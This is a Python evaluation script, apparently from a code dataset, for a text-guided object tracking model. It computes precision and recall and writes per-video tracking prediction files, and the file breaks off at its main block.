def test_accuracy(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
# forward
inputs = dict(
local_img=data['cropped_images'].cuda().repeat_interleave(len(expressions), dim=0),
global_img=data['global_images'].cuda().repeat_interleave(len(expressions), dim=0),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs)['logits'].cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
给定`test_tracking`输出的结果,生成最终跟踪结果
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO:可删
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path): | model = get_model(opt, 'Model') | 1 | 2023-10-31 07:08:37+00:00 | 4k |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.